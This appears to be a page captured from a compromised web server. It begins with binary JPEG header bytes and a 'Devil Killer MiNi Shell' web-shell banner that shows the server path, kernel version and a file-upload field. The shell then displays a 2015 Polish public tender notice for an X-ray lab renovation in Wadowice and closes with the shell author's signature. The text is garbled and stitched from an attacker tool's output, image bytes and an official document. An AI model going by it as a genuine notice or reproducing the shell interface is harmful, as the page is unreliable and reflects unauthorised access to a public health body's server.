JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151231/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151231/359672-N-2015.html

<p class="kh_header"><b>Wadowice: Remont Pracowni RTG z wymianą blatu stołu użytkowanego aparatu oraz dostawa nowego aparatu RTG dla ZZOZ w Wadowicach, znak: ZP/PRZET/51/2015.</b><br>
<b>Numer ogłoszenia: 359672 - 2015; data zamieszczenia: 31.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Zakładów Opieki Zdrowotnej , ul. Karmelicka 5, 34-100 Wadowice, woj. małopolskie, tel. 033 8232230, faks 033 8232230.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zzozwadowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Pracowni RTG z wymianą blatu stołu użytkowanego aparatu oraz dostawa nowego aparatu RTG dla ZZOZ w Wadowicach, znak: ZP/PRZET/51/2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont Pracowni RTG z wymianą blatu stołu użytkowanego aparatu oraz dostawa nowego aparatu RTG dla ZZOZ w Wadowicach.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.40.00.00-1, 33.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 112.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wnieść wadium w
postępowaniu. Wartość wadium wynosi: 9.000,00 zł brutto (słownie brutto: dziewięć tysięcy
złotych), 1.Wadium może być wniesione w jednej lub kilku następujących formach:
1.1.pieniądzu, wpłacone przelewem na rachunek bankowy wskazany przez Zamawiającego,
1.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 1.3.gwarancjach
bankowych, 1.4.gwarancjach ubezpieczeniowych, 1.5.poręczeniach udzielanych przez
podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o
utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r nr 42 poz. 275 z
póź. zm.). 2.Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący
rachunek bankowy Zamawiającego Zespół Zakładów Opieki Zdrowotnej w Wadowicach:
ING Bank Śląski S.A. O/Wadowice, na rachunek 24105011001000002266863279 z adnotacją
wadium numer sprawy ZP PRZET 51 2015 Zaleca się dołączenie do oferty kserokopii
dokumentu potwierdzającego dokonanie przelewu. 3. Za skuteczne wniesienie wadium w
pieniądzu, Zamawiający uzna wadium, które znajdzie się na rachunku bankowym
Zamawiającego przed upływem terminu składania ofert. 4.W przypadku wnoszenia wadium
w formie gwarancji bankowej lub ubezpieczeniowej, gwarancja musi być gwarancją
nieodwołalną, bezwarunkową i płatną na pierwsze żądanie Zamawiającego, sporządzoną
zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy: 4.1.nazwa
dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (Banku
lub Instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib.
4.2.kwotę gwarancji 4.3.termin ważności gwarancji w formule: od dnia do dnia
4.4.zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze żądanie
Zamawiającego w sytuacjach określonych w art. 46 ust 4a oraz art. 46 ust 5 ustawy z dnia 29
stycznia 2004r. Prawo zamówień publicznych. Zamawiający nie dopuszcza możliwości
umieszczenia w treści gwarancji klauzuli dotyczącej pośrednictwa podmiotów trzecich. 5.W
przypadku wnoszenia wadium w formie innej niż pieniężna oryginał dokumentu należy
złożyć w KASIE ZZOZ Wadowice (budynek PPS, ul. Karmelicka 5, I piętro pokój 130),
która jest czynna: poniedziałki, środy, czwartki i piątki od 7:15 do 14:00 oraz we wtorki od
8:25 do 15:45. Kopię gwarancji lub poręczenia należy złożyć wraz z ofertą w Sekretariacie
ZZOZ Wadowice. 6.Tryb zwrotu wadium szczegółowo określa art. 46 ustawy Prawo
zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że w
okresie ostatnich pięciu lat przed upływem termin składania ofert, a w
przypadku, gdy okres prowadzenia działalności jest krótszy- w tym okresie,
wykonał- co najmniej 2 roboty odpowiadających swoim rodzajem robotom
stanowiącym przedmiot zamówienia na kwotę min. 100.000,00 PLN, z
podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem
dowodów dotyczących najważniejszych robót, określających, czy roboty te
zostały wykonane w sposób należyty oraz wskazujący, czy zostały wykonane
zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone w formie
załączonego do oferty wykazu. Dowodami, o których mowa wyżej są
poświadczenia lub inne dokumenty jeżeli z uzasadnionych przyczyn o
obiektywnym charakterze Wykonawca nie jest w stanie uzyskać
poświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna ww warunek za spełniony, jeżeli Wykonawca przedstawi
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z
informacjami na temat ich kwalifikacji zawodowych, doświadczenia i
wykształcenia niezbędnego do wykonania zamówienia, a także zakresu
wykonywanych przez nie czynności oraz informację o podstawie
dysponowania tymi zasobami. W szczególności osoba pełniąca funkcję
kierownika robót winna posiadać uprawnienia w specjalności instalacyjnej w
zakresie sieci, instalacji i urządzeń elektrycznych i elektrotechnicznych.
UWAGA. Wymienione osoby muszą posiadać odpowiednie uprawnienia do
kierowania robotami oraz przynależność do izby zawodowej i ubezpieczenie
od odpowiedzialności Cywilnej. Ocena spełniania tego warunku nastąpi na
podstawie załączonego Wykazu osób. 2. Zamawiający uzna ww warunek za
spełniony, jeżeli Wykonawca przedstawi wykaz osób, które będą uczestniczyć
w wykonywaniu zamówienia, w szczególności odpowiedzialnych za usługi
przeglądów gwarancyjnych wraz z informacjami na temat ich kwalifikacji
zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania
zamówienia, a także zakresu wykonywanych przez nie czynności oraz
informacją o podstawie dysponowania tymi zasobami. Osoby te muszą
spełniać niżej opisane wymagania: 2.1.posiadać min. 3- letnie doświadczenie
w serwisowaniu aparatury medycznej objętej przedmiotem zamówienia,
2.2.posiadać średnie lub wyższe wykształcenie techniczne. Ocena spełniania
tego warunku nastąpi na podstawie załączone- Wykazu osób.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww warunek za spełniony, jeżeli Wykonawca przedstawi
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z
informacjami na temat ich kwalifikacji zawodowych, doświadczenia i
wykształcenia niezbędnego do wykonania zamówienia, a także zakresu
wykonywanych przez nie czynności oraz informację o podstawie
dysponowania tymi zasobami. W szczególności osoba pełniąca funkcję
kierownika robót winna posiadać uprawnienia w specjalności instalacyjnej w
zakresie sieci, instalacji i urządzeń elektrycznych i elektrotechnicznych.
UWAGA. Wymienione osoby muszą posiadać odpowiednie uprawnienia do
kierowania robotami oraz przynależność do izby zawodowej i ubezpieczenie
od odpowiedzialności Cywilnej. Ocena spełniania tego warunku nastąpi na
podstawie załączonego Wykazu osób. 2. Zamawiający uzna ww warunek za
spełniony, jeżeli Wykonawca przedstawi wykaz osób, które będą uczestniczyć
w wykonywaniu zamówienia, w szczególności odpowiedzialnych za usługi
przeglądów gwarancyjnych wraz z informacjami na temat ich kwalifikacji
zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania
zamówienia, a także zakresu wykonywanych przez nie czynności oraz
informacją o podstawie dysponowania tymi zasobami. Osoby te muszą
spełniać niżej opisane wymagania: 2.1.posiadać min. 3- letnie doświadczenie
w serwisowaniu aparatury medycznej objętej przedmiotem zamówienia
2.2.posiadać średnie lub wyższe wykształcenie techniczne. Ocena spełniania
tego warunku nastąpi na podstawie załączone Wykazu osób</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie o spełnianiu warunków udziału w postępowaniu,2.Formularz
ofertowy,3.Kosztorys ofertowy -uproszczony z tabelą elementów scalonych w układzie
poszczególnych robót, 4.Wykaz osób które będą uczestniczyć w wykonywaniu tj: kierownik
robót w zakresie specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
elektrycznych i elektroenergetycznych - wraz z informacjami na temat jego kwalifikacji
zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także
zakresu wykonywanych przez niego czynności, oraz informacją o podstawie do
dysponowania osobą, 5.Wykaz osób które będą uczestniczyć w wykonywaniu zamówienia, w
szczególności odpowiedzialnych za świadczenie usługi przeglądów gwarancyjnych wraz z
informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia
niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie
czynności oraz informację o podstawie do dysponowania tymi osobami, 6.Oświadczenie o
spełnianiu przez oferowany przedmiot zamówienia wymagań przewidzianych przez ustawę z
dnia 20 maja 2010r. o wyrobach medycznych (Dz. U. z 2010r. Nr 107 poz. 679 ze zm.),
potwierdzające dopuszczenie tych wyrobów do obrotu i używania, oraz przez Rozporządzenie
Ministra Zdrowia z dnia 12 stycznia 2011r. w sprawie wymagań zasadniczych dla wyrobów
medycznych do rożnego przeznaczenia (Dz. U z 2011 Nr 16 poz.74 ze zm.) oraz
oświadczenie o posiadaniu w/w dokumentów, 7.Katalogi, materiały informacyjne dla
oferowanego sprzętu medycznego - z zaznaczeniem oferowanych parametrów technicznych -
dotyczy aparatu RTG, 8.Oświadczenie o częstotliwości wykonywania przeglądów
gwarancyjnych i pogwarancyjnych (zgodnie z instrukcją użytkowania Producenta- dotyczy
aparatu RTG, 9.Dokument/ certyfikat potwierdzający, że Wykonawca jest autoryzowanym
serwisantem lub też jest uprawniony do dokonywania napraw/ przeglądów danej aparatury
medycznej potwierdzony przez producenta. - dotyczy aparatu RTG, 10.Pisemne zobowiązanie
innych podmiotów, zgodnie z art. 26 ust 2b ustawy Pzp do oddania Wykonawcy do
dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia
w szczególności zawierające opis charakteru stosunku, jaki będzie łączył Wykonawcę z
innym podmiotem, oraz zakres i okres udziału innego podmiotu przy wykonywaniu
zamówienia - jeśli dotyczy, 11.W przypadku, gdy Wykonawca działa przez pełnomocnika, do
oferty winien być dołączony dokument stwierdzający upoważnienie pełnomocnika do
reprezentowania Wykonawcy (pełnomocnictwo)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji zamówienia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1 Zmiana postanowień umowy może być dokonana w przypadku zmian nieistotnych w
stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy lub zmian
istotnych tj. w zakresie okoliczności, których nie można było przewidzieć w chwili zawarcia
umowy w zakresie terminu wykonania umowy: 1.1z powodu wystąpienia dodatkowych, a
niemożliwych do przewidzenia przed zawarciem umowy przez Wykonawcę robót, 1.2z
powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są
konsekwencją winy którejkolwiek ze stron, 1.3z powodu okoliczności siły wyższej, np.
wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można
było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub
zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, to jest m. in.
klęski żywiołowe (huragany, powodzie, trzęsienia ziemi)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zzozwadowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych, Zespół Zakładów Opieki Zdrowotnej w Wadowicach, ul. Karmelicka 5, 34-100 Wadowice..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2016 godzina 12:00, miejsce: Ofertę należy złożyć w Sekretariacie, (pok. nr 230) lub przesłać na adres Zamawiającego: Zespół Zakładów Opieki Zdrowotnej w Wadowicach; ul. Karmelicka 5, 34-100 Wadowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com